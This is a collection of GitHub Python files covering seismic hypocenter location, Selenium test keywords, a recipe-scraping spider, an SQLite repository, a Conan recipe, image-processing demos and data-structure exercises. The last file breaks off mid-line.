+{"seq_id":"43467311227","text":"import os\nfrom glob import glob\nfrom pathlib import Path\nfrom shutil import copy\n\nfrom core.Catalog import catalog2xyzm\nfrom core.Magnitude import setMagnitude\nfrom tqdm import tqdm\nfrom obspy import read_events\n\nfrom hypocenter.Station import toSTATION0HYP\n\n\ndef locateHypocenter(config):\n    locationPath = os.path.join(\"results\", \"location\", \"hypocenter\")\n    Path(locationPath).mkdir(parents=True, exist_ok=True)\n    cmd = \"cat results/*_*.out > results/all.out\"\n    os.system(cmd)\n    catalog = read_events(os.path.join(\"results\", \"all.out\"))\n    toSTATION0HYP(config, catalog)\n    catalogs = glob(os.path.join(\"results\", \"all.out\"))\n    desc = \"+++ Locate catalog using 'Hypocenter' ...\"\n    for catalogFile in tqdm(catalogs, desc=desc):\n        copy(catalogFile, locationPath)\n        copy(os.path.join(\"files\", \"select.inp\"), locationPath)\n        copy(os.path.join(\"results\", \"STATION0.HYP\"), locationPath)\n        root = os.getcwd()\n        os.chdir(locationPath)\n        with open(\"hyp.inp\", \"w\") as f:\n            f.write(\"all.out\\nn\\n\")\n        cmd = \"hyp < hyp.inp >/dev/null 2>/dev/null\"\n        os.system(cmd)\n        catalog2xyzm(config, \"hyp.out\", \"hypocenter\")\n        cmd = \"select select.inp >/dev/null 2>/dev/null\"\n        os.system(cmd)\n        setMagnitude(\"select.out\", config)\n        os.chdir(root)\n","repo_name":"saeedsltm/DPLE","sub_path":"hypocenter/Locate.py","file_name":"Locate.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33616741099","text":"from SeleniumLibrary.base import keyword\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom SeleniumLibrary import SeleniumLibrary\nimport clipboard\nclass SeleniumELibrary(SeleniumLibrary):\n    @keyword\n    def 
right_click_element_at_coordinates(self, locator, xoffset, yoffset):\n element = self.find_element(locator)\n action = ActionChains(self.driver)\n action.move_to_element(element)\n action.move_by_offset(xoffset, yoffset)\n action.context_click()\n action.perform()\n\n\n @keyword\n def double_click_element_at_coordinates(self, locator, xoffset, yoffset):\n element = self.find_element(locator)\n action = ActionChains(self.driver)\n action.move_to_element(element)\n action.move_by_offset(xoffset, yoffset)\n action.double_click()\n action.perform()\n \n @keyword\n def Mouse_Move(self,xoffset,yoffset):\n action = ActionChains(self.driver)\n action.move_by_offset(xoffset,yoffset)\n action.click(None)\n action.perform()\n\n @keyword\n def copy_to_clipboard(self, command):\n clipboard.copy(command)\n\n @keyword\n def paste_command_to_console(self, command):\n clipboard.copy(command)\n \n \n # @keyword\n # def double_click_element_at_coordinates(self, locator, xoffset, yoffset):\n # element = self.find_element(locator)\n # ActionChains(self.driver).move_to_element_with_offset(element, xoffset, yoffset).double_click().perform()\n","repo_name":"PARTTIC/AutomatedTesting","sub_path":"RobotFramework_Wolftail/resources/library/SeleniumELibrary.py","file_name":"SeleniumELibrary.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"375047156","text":"import unittest\n\nimport gi # nopep8\ngi.require_version('Gst', '1.0') # nopep8\ngi.require_version('GstVideo', '1.0') # nopep8\nfrom gi.repository import Gst\nfrom gi.repository import GstVideo\nimport numpy as np\nimport cv2 as cv\n\nfrom rr.actions.record_event import RecordEvent\n\n\nwidth = 320\nheight = 240\nfmt = \"RGBA\"\nsize = 320 * 240 * 4\ndata = np.zeros((size))\n\n\nclass mockMedia():\n def __init__(self, name):\n self.media_name = name\n\n def get_name(self):\n return self.media_name\n\n\nclass MockSample():\n def __init__(self):\n self._pts = 0\n\n def get_buffer(self):\n data = np.zeros((size))\n buf = Gst.Buffer.new_wrapped(data)\n buf.pts = self._pts\n buf.dts = self._pts\n buf.duration = 33333333\n self._pts = self._pts + 33333333\n return buf\n\n\nclass MockImage():\n def __init__(self, timestamp):\n self._sample = MockSample()\n self._timestamp = timestamp\n\n def get_width(self):\n return width\n\n def get_height(self):\n return height\n\n def get_format(self):\n return fmt\n\n def get_sample(self):\n return self._sample\n\n def get_timestamp(self):\n return self._timestamp\n\n\nclass MockFilter():\n def __init__(self, status):\n self.trigger_status = status\n\n def is_triggered(self):\n return self.trigger_status\n\n\nclass TestRecordEvent(unittest.TestCase):\n\n def test_record_event_success(self):\n rec_dir = '/tmp'\n timestamp = '2021-07-27-12:00:20'\n img = MockImage(timestamp)\n fil = MockFilter(True)\n num_bufs = 10\n rec_time = 15.0\n event_rec = RecordEvent(\"name\", rec_dir, rec_time)\n\n media0 = mockMedia(\"media0\")\n for i in range(num_bufs):\n event_rec.execute(media0, img, None, [fil])\n\n media1 = mockMedia(\"media1\")\n for i in range(num_bufs):\n if i == 2:\n fil.trigger_status = False\n event_rec.execute(media1, img, rec_time, [fil])\n\n event_rec.stop_recordings()\n\n path_media0 = \"/tmp/detection_recording_media0_\" + timestamp + \".ts\"\n path_media1 = \"/tmp/detection_recording_media1_\" + timestamp + \".ts\"\n\n reader_media0 = cv.VideoCapture(path_media0)\n reader_media1 = cv.VideoCapture(path_media1)\n\n 
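# isOpened() only succeeds on a readable container, so an opened\n        # reader is the observable proof that a playable .ts file was written.\n        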
self.assertEqual(True, reader_media0.isOpened())\n self.assertEqual(True, reader_media1.isOpened())\n\n def test_not_recording_success(self):\n rec_dir = '/tmp'\n timestamp = '2022-08-27-12:00:20'\n img = MockImage(timestamp)\n fil = MockFilter(False)\n num_bufs = 10\n rec_time = 5.0\n event_rec = RecordEvent(\"name\", rec_dir, rec_time)\n\n media2 = mockMedia(\"media2\")\n for i in range(num_bufs):\n event_rec.execute(media2, img, None, [fil])\n\n path_media2 = \"/tmp/detection_recording_media2_\" + timestamp + \".ts\"\n\n reader_media2 = cv.VideoCapture(path_media2)\n\n self.assertEqual(False, reader_media2.isOpened())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"RidgeRun/ti-edge-ai-demos","sub_path":"tests/actions/test_record_event.py","file_name":"test_record_event.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31206635552","text":"import logging\n\nfrom typing import List, Optional\nfrom fastapi import Request\nfrom starlette.datastructures import FormData\n\nfrom schemas.image import ImageInfo\n\n\ndef query_param_alias(request: Request, aliases: List[str]) -> Optional[str]:\n for alias in aliases:\n param_value = request.query_params.get(alias)\n if param_value is not None:\n return param_value\n return None\n\n\nasync def form_data_alias(request: Request, aliases: List[str]) -> Optional[str]:\n form_data: FormData = await request.form()\n for alias in aliases:\n if alias in form_data:\n return form_data[alias]\n return None\n\n\nasync def log_request_info(\n request: Request,\n docType: Optional[str],\n pageNo: Optional[int],\n imgFile: Optional[bytes],\n):\n logging.info(\n f\"\\n[Request Info]\\n\"\n f\" - Method: {request.method}\\n\"\n f\" - URL: {request.url}\\n\"\n f\"\\n[Request Body]\\n\"\n f\" - docType: {docType}\\n\"\n f\" - pageNo: {pageNo}\\n\"\n f\" - imgFile: {imgFile}\\n\"\n )\n\n\nasync def process_request(\n docType: Optional[str], pageNo: Optional[int], imgFile: Optional[bytes]\n) -> ImageInfo:\n image_info = ImageInfo()\n\n image_info.document_type = docType\n if pageNo is not None:\n image_info.page_number = pageNo\n if imgFile is not None:\n image_info.img_file = imgFile\n\n return image_info\n","repo_name":"onair0817/fastapi-toy-project","sub_path":"app/utils/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"24040591265","text":"import unittest\n\nfrom cirque.capabilities.mountcapability import MountCapability\n\n\nclass TestMountCapability(unittest.TestCase):\n\n def test_mount_capability(self):\n mountcapability = MountCapability([('aaa', 'bbb')])\n self.assertEqual(mountcapability.name, 'Mount')\n args = mountcapability.get_docker_run_args(None)\n self.assertIn('volumes', args)\n self.assertEqual('aaa:bbb', args['volumes'][0])\n\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(TestMountCapability)\n unittest.TextTestRunner(verbosity=2).run(suite)\n","repo_name":"openweave/cirque","sub_path":"cirque/capabilities/test/test_mount_capability.py","file_name":"test_mount_capability.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"77"} +{"seq_id":"21655333247","text":"import time\r\nimport torch\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport os\r\n\r\ndef 
benchmark(funcs, inputs, labels, metrics):\r\n    device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n    # Initialize metric dictionaries\r\n    metric_values = {}\r\n    for func in funcs:\r\n        metric_values[func.__class__.__name__] = {metric.__class__.__name__: [] for metric in metrics}\r\n\r\n    # Run each function and compute metrics for each input\r\n    for func in funcs:\r\n        for i in range(len(inputs)):\r\n            input_tensor = torch.Tensor(inputs[i]).to(device)\r\n            label_tensor = torch.Tensor(labels[i]).to(device)\r\n\r\n            start_time = time.time()\r\n            output = func(input_tensor)\r\n            elapsed_time = time.time() - start_time\r\n\r\n            for metric in metrics:\r\n                metric_values[func.__class__.__name__][metric.__class__.__name__].append(metric(output.detach(), label_tensor.detach()).item())\r\n\r\n            print(\"%s - Input %d: %.4f seconds\" % (func.__class__.__name__, i, elapsed_time))\r\n\r\n    # Print metric values for each function and each input\r\n    for func in funcs:\r\n        for metric in metrics:\r\n            print(\"%s - %s: %.4f\" % (func.__class__.__name__, metric.__class__.__name__, sum(metric_values[func.__class__.__name__][metric.__class__.__name__]) / len(metric_values[func.__class__.__name__][metric.__class__.__name__])))\r\n\r\n    return metric_values\r\n\r\ndef plot_benchmark(metric_values, metrics, n=10):\r\n    # Create directory to save plots\r\n    save_dir = time.strftime(\"%Y-%m-%d_%H-%M-%S\")\r\n    if not os.path.exists(save_dir):\r\n        os.mkdir(save_dir)\r\n\r\n    # Plot metric values for each metric\r\n    for metric in metrics:\r\n        metric_dir = os.path.join(save_dir, metric.__class__.__name__)\r\n        if not os.path.exists(metric_dir):\r\n            os.mkdir(metric_dir)\r\n\r\n        fig, ax = plt.subplots(figsize=(8, 6))\r\n        metric_name = metric.__class__.__name__\r\n\r\n        # Get the length of the values from the first function\r\n        # (metric_values is keyed by function name, then by metric name)\r\n        index = np.arange(len(next(iter(metric_values.values()))[metric_name]))\r\n\r\n        for func_name, func_metrics in metric_values.items():\r\n            ax.plot(index, func_metrics[metric_name], label=func_name)\r\n\r\n        ax.set_xlabel('Input')\r\n        ax.set_ylabel('Metric value')\r\n        ax.set_title('Benchmark results')\r\n        ax.set_xticks(index[::n])\r\n        ax.set_xticklabels(index[::n])\r\n        ax.legend()\r\n\r\n        plt.tight_layout()\r\n        plt.savefig(os.path.join(metric_dir, f\"{save_dir}_{metric_name}.png\"))\r\n        plt.close()\r\n","repo_name":"HarshitGupta29/Benchmarking-InstantNGP","sub_path":"benchmark_suite.py","file_name":"benchmark_suite.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2259429929","text":"import app_state\nfrom gi.repository import Gtk\n\n\nclass SettingsDialog(Gtk.Dialog):\n\n    def __init__(self, parent):\n        Gtk.Dialog.__init__(\n            self, \"Settings\", parent, 0,\n            (Gtk.STOCK_CANCEL,\n             Gtk.ResponseType.CANCEL,\n             Gtk.STOCK_SAVE,\n             Gtk.ResponseType.OK))\n        self.set_default_size(320, 400)\n        self.set_border_width(10)\n        self.props.resizable = False\n        self.deleted_locations = []\n        self.init_components()\n\n    def init_components(self):\n        container = self.get_content_area()\n\n        # labels\n        container.pack_start(Gtk.Label('Locations'), False, False, 0)\n        help_label = Gtk.Label()\n        help_label.set_markup('double click any cell to edit')\n        container.pack_start(help_label, False, False, 0)\n\n        # tree view\n        self.treeview_container = Gtk.ScrolledWindow()\n        self.treeview_container.set_vexpand(True)\n        locations = app_state.get_locations()\n        self.store = Gtk.ListStore(str, str, str, str)\n        for loc in 
locations:\n self.store.append(loc)\n self.treeview = Gtk.TreeView(model=self.store)\n for i, column_title in enumerate([\"Id\", \"Location Name\", \"Latitude\", \"Longitude\"]):\n renderer = Gtk.CellRendererText()\n if i == 0:\n column = Gtk.TreeViewColumn(column_title, renderer, text=i)\n column.props.visible = False\n else:\n renderer.props.editable = True\n renderer.connect(\"edited\", self.text_edited_handler(i))\n column = Gtk.TreeViewColumn(column_title, renderer, text=i)\n column.set_min_width(50)\n column.set_sizing(Gtk.TreeViewColumnSizing.AUTOSIZE)\n column.set_resizable(True)\n self.treeview.append_column(column)\n self.treeview_container.add(self.treeview)\n container.pack_start(self.treeview_container, True, True, 10)\n\n # action bar\n action_bar = Gtk.ActionBar()\n add_button = Gtk.Button.new_from_icon_name(\"list-add-symbolic\", Gtk.IconSize.LARGE_TOOLBAR)\n add_button.connect('clicked', self.add_button_clicked)\n action_bar.pack_start(add_button)\n delete_button = Gtk.Button.new_from_icon_name(\"edit-delete-symbolic\", Gtk.IconSize.LARGE_TOOLBAR)\n delete_button.connect('clicked', self.delete_button_clicked)\n action_bar.pack_start(delete_button)\n container.pack_end(action_bar, False, False, 5)\n\n self.show_all()\n\n def text_edited_handler(self, column_index):\n def text_edited(widget, path, text): # @UnusedVariable\n self.store[path][column_index] = text\n return text_edited\n\n def add_button_clicked(self, widget): # @UnusedVariable\n new_loation_model = ('-1', '_name_', '_lat_', '_long_')\n self.store.append(new_loation_model)\n\n def delete_button_clicked(self, widget): # @UnusedVariable\n selection = self.treeview.get_selection()\n model, paths = selection.get_selected_rows()\n self.deleted_locations.append(list(self.store[paths[0]]))\n for path in paths:\n model.remove(model.get_iter(path))\n\n def save_settings(self):\n locations = list(self.store)\n app_state.save_locations(locations, self.deleted_locations)\n\n\n# end of file\n","repo_name":"rabihkodeih/moonshot","sub_path":"dialogs/settings_dialog.py","file_name":"settings_dialog.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25810993247","text":"\"\"\"\n# https://leetcode.com/problems/copy-list-with-random-pointer/\n\nA linked list of length n is given such that each node contains an additional\nrandom pointer, which could point to any node in the list, or null.\n\nConstruct a deep copy of the list. The deep copy should consist of exactly n\nbrand new nodes, where each new node has its value set to the value of its\ncorresponding original node. Both the next and random pointer of the new nodes\nshould point to new nodes in the copied list such that the pointers in the\noriginal list and copied list represent the same list state. 
None of the\npointers in the new list should point to nodes in the original list.\n\nFor example, if there are two nodes X and Y in the original list, where X.random\n--> Y, then for the corresponding two nodes x and y in the copied list, x.random\n--> y.\n\nReturn the head of the copied linked list.\n\"\"\"\n\nfrom collections import defaultdict\n\nclass Solution_1:\n    # Not mine!\n    # https://leetcode.com/problems/copy-list-with-random-pointer/discuss/43485/Clear-and-short-python-O(2n)-and-O(n)-solution\n    def copyRandomList(self, head: \"Node\") -> \"Node\":\n        dic = defaultdict(lambda: Node(0))\n        dic[None] = None\n        n = head\n        while n:\n            dic[n].val = n.val\n            dic[n].next = dic[n.next]\n            dic[n].random = dic[n.random]\n            n = n.next\n        return dic[head]\n\nclass Solution:\n    def copyRandomList(self, head: \"Node\") -> \"Node\":\n        if not head:\n            return None\n\n        old_head = head\n        new_head = Node(x=old_head.val)\n\n        old_random_nodes = [old_head.random]\n        old_node_to_new_node = {old_head: new_head}\n        \n        # Deep copy\n        new_node = new_head\n        for old_node in iter_nodes(old_head.next):\n            old_random_nodes.append(old_node.random)\n            new_node.next = Node(x=old_node.val)\n            new_node = new_node.next            \n            old_node_to_new_node[old_node] = new_node\n\n        # Set random pointers\n        for new_node, old_random_node in zip(iter_nodes(new_head), old_random_nodes):\n            if old_random_node:\n                new_node.random = old_node_to_new_node[old_random_node]\n            else:\n                new_node.random = None\n        \n        return new_head\n    \n    \ndef iter_nodes(head):\n    if head:\n        yield head\n        yield from iter_nodes(head.next)\n\n# Definition for a Node.\nclass Node:\n    def __init__(self, x: int, next: 'Node' = None, random: 'Node' = None):\n        self.val = int(x)\n        self.next = next\n        self.random = random\n","repo_name":"dandavison/misc-python","sub_path":"lc-copy-list-with-random-pointer.py","file_name":"lc-copy-list-with-random-pointer.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42571586958","text":"# import necessary libraries\nimport cv2\nimport matplotlib.pyplot as plt\n\n# read in the original image in grayscale\noriginal_img = cv2.imread(\"../images/Fig0221(a)(ctskull-256).tif\", flags=0)\n\n# the number of gray levels of the original image\nORIGINAL_GRAY_LEVELS = 256\n\n# define a list of target gray levels to which we will reduce the image\ntarget_gray_levels = [128, 64, 32, 16, 8, 4, 2]\n\n# create an empty list to store the reduced images\nreduced_img = []\n\n# loop over each target gray level\nfor levels in target_gray_levels:\n    # calculate the scaling factor for this level\n    alpha = ((levels - 1) / (ORIGINAL_GRAY_LEVELS - 1))\n\n    # reduce the image to the target gray level and append it to the list of reduced images\n    reduced_img.append(cv2.convertScaleAbs(original_img, alpha=alpha))\n\n# display the original image with 256 gray levels and the reduced images with the specified number of gray levels\nplt.subplots(2, 4, figsize=(14.4, 8.64))\nplt.subplot(241), plt.imshow(original_img, cmap='gray'), plt.title(\"256 levels\"), plt.axis('off')\nfor i in range(7):\n    plt.subplot(242 + i), plt.imshow(reduced_img[i], cmap='gray'), \\\n        plt.title(f\"{target_gray_levels[i]} levels\"), plt.axis('off')\nplt.suptitle(\"Intensity Under-sampling\", 
fontsize=20)\nplt.show()\n","repo_name":"Archelder/Digital-Image-Processing","sub_path":"Experiments/Exp.2/codes/under-sampling_intensity.py","file_name":"under-sampling_intensity.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"13815347014","text":"import scrapy\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom bonapp_spider.items import BonappItem\nimport re\n\n\nclass BonappBasicallySpider(CrawlSpider):\n # using crawl spider because i want to generalise the solution to keep clicking if there's a next page\n name = \"bonapp_basically_crawler\"\n allowed_domains = ['www.bonappetit.com']\n start_urls = ['https://www.bonappetit.com/healthyish/recipes/'] # change basically to healthyish if scraping for that\n\n # using CrawlSpider so rules need to be set\n # first rule checks if there's a next page available and follows it\n # second rule requests for all the links on the page that are in the specified format: /recipes/name\n rules = (\n Rule(LinkExtractor(restrict_xpaths=\"//a[contains(@class, 'pager__link--next')]\"), follow=True),\n Rule(LinkExtractor(restrict_xpaths=\"//h1[@class='feature-item-hed']//a\"), callback='parse_recipe_page')\n\n )\n\n def parse_recipe_page(self, response):\n\n title = response.xpath('//head//title/text()').get().split(' Recipe', 1)[0]\n\n author = response.xpath('//head//meta[@name=\"author\"]//@content').get()\n\n date = response.xpath('//div//time/text()').get() # this is not present in all types of recipes so add if else statement\n\n ## Some recipe pages (e.g. from Basically) have a different format\n if response.xpath('//div[@data-testid=\"IngredientList\"]'):\n ingredients = response.xpath(\n '//div[@data-testid=\"IngredientList\"]//div/descendant-or-self::*/text()').extract()\n else:\n ## Some ingredients have hyperlinked words for brands, the following navigates that possibility\n ingredients = []\n ingred_bin = response.xpath('//div[@class=\"ingredients__text\"]')\n for ingred in ingred_bin:\n if ingred.xpath('./a'):\n ingredients.append(''.join(ingred.xpath('.//descendant-or-self::*/text()').extract()))\n else:\n ingredients.append(ingred.xpath('./text()').extract()[0])\n\n ## Some recipes have no reviews/ratings so the following code accounts for it\n # identifies recipe pages with reviews by looking for the div class with id=reviews\n if response.xpath('//div[@id=\"reviews\"]'):\n review_header = response.xpath('//div[@id=\"reviews\"]//p/text()').get() # review_count is is x in Reviews (x)\n review_count = re.findall(r'(\\d+)', review_header)[0] # extract digits from the string as a string (otherwise re returns it as a list)\n else: review_count = 0\n\n # identifies recipe pages with ratings by seeing if the following div class has a p element (because the p element contains the rating and rating count)\n if response.xpath('//div[@data-testid=\"RatingWrapper\"]//p'):\n rating = response.xpath('//div[@data-testid=\"RatingWrapper\"]//p/text()')[0].get()\n ratings_count = response.xpath('//div[@data-testid=\"RatingWrapper\"]//p/text()')[2].get() # the ratings count is sandwiched between two parantheses\n else:\n rating = 'NA'\n ratings_count = 0\n\n # obtain tags from tagcloudwrapper\n tags = response.xpath('//div[@data-testid=\"TagCloudWrapper\"]//a//span/text()').getall()\n\n\n item = BonappItem()\n item[\"title\"] = title\n item[\"author\"] = author\n item[\"date\"] = date\n 
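# Fill the item field by field; the defaults above ('NA' and 0) keep the\n        # exported schema consistent for recipes without ratings or reviews.\n        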
item[\"ingredients\"] = ingredients\n item[\"rating\"] = rating\n item[\"ratings_count\"] = ratings_count\n item[\"review_count\"] = review_count\n item[\"tags\"] = tags\n item[\"url\"] = response.url\n\n yield item","repo_name":"fangningtan/bon-app","sub_path":"bonapp_spider/spiders/bonapp-basically-spider.py","file_name":"bonapp-basically-spider.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43516019060","text":"from Infrastructure.inmemrepo.activity_repository import *\nimport sqlite3\nclass ActivitySqlRepo(ActivityRepo):\n\n def __init__(self, persons_repo):\n ActivityRepo.__init__(self, persons_repo)\n self.__connection = self.create_connection(\"activities\")\n create_persons_table = \"\"\"\n CREATE TABLE IF NOT EXISTS activities (\n activity_id INTEGER,\n persons_id TEXT NOT NULL,\n date TEXT NOT NULL,\n time TEXT NOT NULL,\n description TEXT NOT NULL\n );\n \"\"\"\n self.execute_query(self.__connection, create_persons_table)\n\n @staticmethod\n def create_connection(name):\n connection = sqlite3.connect(\"database/\" + name + \".sqlite\")\n return connection\n\n @staticmethod\n def execute_query(connection, query):\n cursor = connection.cursor()\n cursor.execute(query)\n connection.commit()\n\n def read_all_from_database(self):\n cursor = self.__connection.cursor()\n cursor.execute(\"SELECT * FROM activities\")\n activities_tuples = cursor.fetchall()\n for activity in activities_tuples:\n ActivityRepo.add_activity(self, [activity[0], activity[1].split(), activity[2], activity[3], activity[4]])\n\n def delete_activity_sql(self, id):\n cursor = self.__connection.cursor()\n cursor.execute('DELETE FROM activities WHERE activity_id=?', (id,))\n self.__connection.commit()\n\n def add_activity(self, new_activity):\n aux_new_activity = new_activity[:]\n ActivityRepo.add_activity(self, new_activity)\n cursor = self.__connection.cursor()\n\n aux_id_string = \"\"\n for pers_id in aux_new_activity[1][:]:\n string_aux = str(pers_id) + \" \"\n aux_id_string += string_aux\n\n aux_id_string = aux_id_string[:-1][:]\n cursor.execute(\"insert into activities (activity_id, persons_id, date, time, description) values (?, ?, ?, ?, ?)\", (int(aux_new_activity[0]), aux_id_string, aux_new_activity[2], aux_new_activity[3], aux_new_activity[4]))\n self.__connection.commit()\n\n def remove_activity_by_id(self, given_id):\n removed_activity = ActivityRepo.remove_activity_by_id(self, given_id)\n self.delete_activity_sql(given_id)\n return removed_activity\n\n def get_all(self):\n return ActivityRepo.get_all(self)\n\n def update_available_person_id_list(self, persons_list):\n ActivityRepo.update_available_person_id_list(self, persons_list)\n\n def update_schedule(self, activity_moment):\n ActivityRepo.update_schedule(self, activity_moment)\n\n\n","repo_name":"Tasadan-Filip/Activity-Planner-Application-with-Graphical-User-Interface","sub_path":"Infrastructure/SQL_Lite_repo/activities_sql_lite_database_repo.py","file_name":"activities_sql_lite_database_repo.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38307135343","text":"#stream of text put into compiler\r\ntext = 'x = ( 5 + 6 ) * ( 3 - 4 )'\r\n\r\n#function to tokenize the stream of text\r\nclass LexicalAnalyser():\r\n def __init__(self):\r\n self.tokens = []\r\n self.integers = (\"0123456789\")\r\n self.operators ={\r\n \"+\":\"Add\",\r\n 
\"-\":\"Subtract\",\r\n \"/\":\"divide\",\r\n \"*\":\"multiply\",\r\n }\r\n self.literals = ('\"')\r\n self.punctuation = (\".\", \",\", \";\", \",\")\r\n self.identifiers = {}\r\n self.colon = (\":\")\r\n self.openBracket = (\"(\")\r\n self.closeBracket = (\")\")\r\n self.conditional = (\"if\", \"else\", \"elif\")\r\n \r\n def tokenize(self, text):\r\n i = 0\r\n \r\n while i < len(text):\r\n \r\n if i == \" \":\r\n pass\r\n elif text[i] == self.openBracket:\r\n self.tokens.append((\"open bracket\", i))\r\n elif text[i] == self.closeBracket:\r\n self.tokens.append((\"close bracket\", i))\r\n elif text[i] == self.colon:\r\n self.tokens.append((\"colon\", i))\r\n elif text[i] in self.integers:\r\n s = f\"{text[i]}\"\r\n i += 1\r\n while i =1.53.0\"\n\n\nclass H3Conan(ConanFile):\n name = \"h3\"\n description = \"Hexagonal hierarchical geospatial indexing system.\"\n license = \"Apache-2.0\"\n topics = (\"hierarchical\", \"geospatial\", \"indexing\")\n homepage = \"https://github.com/uber/h3\"\n url = \"https://github.com/conan-io/conan-center-index\"\n\n package_type = \"library\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n \"build_filters\": [True, False],\n \"h3_prefix\": [\"ANY\"],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n \"build_filters\": True,\n \"h3_prefix\": \"\",\n }\n\n def export_sources(self):\n export_conandata_patches(self)\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n self.options.rm_safe(\"fPIC\")\n self.settings.rm_safe(\"compiler.libcxx\")\n self.settings.rm_safe(\"compiler.cppstd\")\n\n def layout(self):\n cmake_layout(self, src_folder=\"src\")\n\n def build_requirements(self):\n if Version(self.version) >= \"4.1.0\":\n self.tool_requires(\"cmake/[>=3.20 <4]\")\n\n def source(self):\n get(self, **self.conan_data[\"sources\"][self.version], strip_root=True)\n\n def generate(self):\n tc = CMakeToolchain(self)\n tc.variables[\"H3_PREFIX\"] = self.options.h3_prefix\n tc.variables[\"ENABLE_COVERAGE\"] = False\n tc.variables[\"BUILD_BENCHMARKS\"] = False\n tc.variables[\"BUILD_FILTERS\"] = self.options.build_filters\n tc.variables[\"BUILD_GENERATORS\"] = False\n tc.variables[\"WARNINGS_AS_ERRORS\"] = False\n tc.variables[\"ENABLE_FORMAT\"] = False\n tc.variables[\"ENABLE_LINTING\"] = False\n tc.variables[\"ENABLE_DOCS\"] = False\n tc.variables[\"BUILD_TESTING\"] = False\n tc.generate()\n\n def build(self):\n apply_conandata_patches(self)\n cmake = CMake(self)\n cmake.configure()\n cmake.build()\n\n def package(self):\n copy(self, \"LICENSE\", src=self.source_folder, dst=os.path.join(self.package_folder, \"licenses\"))\n cmake = CMake(self)\n cmake.install()\n rmdir(self, os.path.join(self.package_folder, \"lib\", \"cmake\"))\n\n def package_info(self):\n self.cpp_info.set_property(\"cmake_file_name\", \"h3\")\n self.cpp_info.set_property(\"cmake_target_name\", \"h3::h3\")\n self.cpp_info.libs = [\"h3\"]\n self.cpp_info.defines.append(f\"H3_PREFIX={self.options.h3_prefix}\")\n if self.settings.os in [\"Linux\", \"FreeBSD\"]:\n self.cpp_info.system_libs.append(\"m\")\n\n if self.options.build_filters:\n self.env_info.PATH.append(os.path.join(self.package_folder, 
\"bin\"))\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/h3/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"4974363536","text":"from __future__ import print_function\n\nclass Node:\n def __init__(self, key):\n self.key = key\n self.parent = None\n self.left = None\n self.right = None\n\n def insertLeft(self, t):\n self.left = t\n t.parent = self\n\n def insertRight(self, t):\n self.right = t\n t.parent = self\n\n def printTree0(self):\n if(self.left != None):\n self.left.printTree0()\n if(self.right != None):\n self.right.printTree0()\n print(self.key, end=\" \")\n \n def printTree1(self):\n if(self.left != None):\n self.left.printTree1()\n print(self.key, end=\" \")\n if(self.right != None):\n self.right.printTree1()\n \n def printTree2(self):\n print(self.key, end=\" \")\n if(self.left != None):\n self.left.printTree2()\n if(self.right != None):\n self.right.printTree2()\n \n def adjustHeap(self):\n leftKey = 0\n rightKey = 0\n maxChild = None\n if(self.left != None):\n leftKey = self.left.key\n if(self.right != None):\n rightKey = self.right.key\n if(leftKey > rightKey):\n maxChild = self.left\n elif(leftKey < rightKey):\n maxChild = self.right\n if(maxChild.key > self.key):\n tmp = self.key\n self.key = maxChild.key\n maxChild.key = tmp\n maxChild.adjustHeap()\n\n def makeBST(self, x):\n if(self.key == None):\n self.key = x\n return self\n q = self\n while(q != None):\n if(q.key == x):\n return self\n elif (q.key > x):\n if(q.left != None):\n q = q.left\n else:\n q.insertLeft(Node(x))\n return self\n elif (q.key < x):\n if(q.right != None):\n q = q.right\n else:\n q.insertRight(Node(x))\n return self\n return self\n\n def deleteInBST(self, x):\n p = self\n q = None #hold the parent during search\n pNode = None #hold the processing node\n cNode = None #hold the child node\n while p != None:\n if p.key == x:\n break\n q = p\n if (x < p.key):\n p = p.left\n if (x > p.key):\n p = p.right\n if p == None:\n return\n if (p.left != None and p.right != None):\n pNode = p\n q = p\n p = p.left\n while(p.right != None):\n q = p\n p = p.right\n pNode.key = p.key\n else:\n q = p.parent\n if(p.left != None):\n cNode = p.left\n else:\n cNode = p.right\n if q.left == p:\n q.left = cNode\n else:\n q.right = cNode\n return\n\ndef generateBinaryTree(depth, x):\n n = 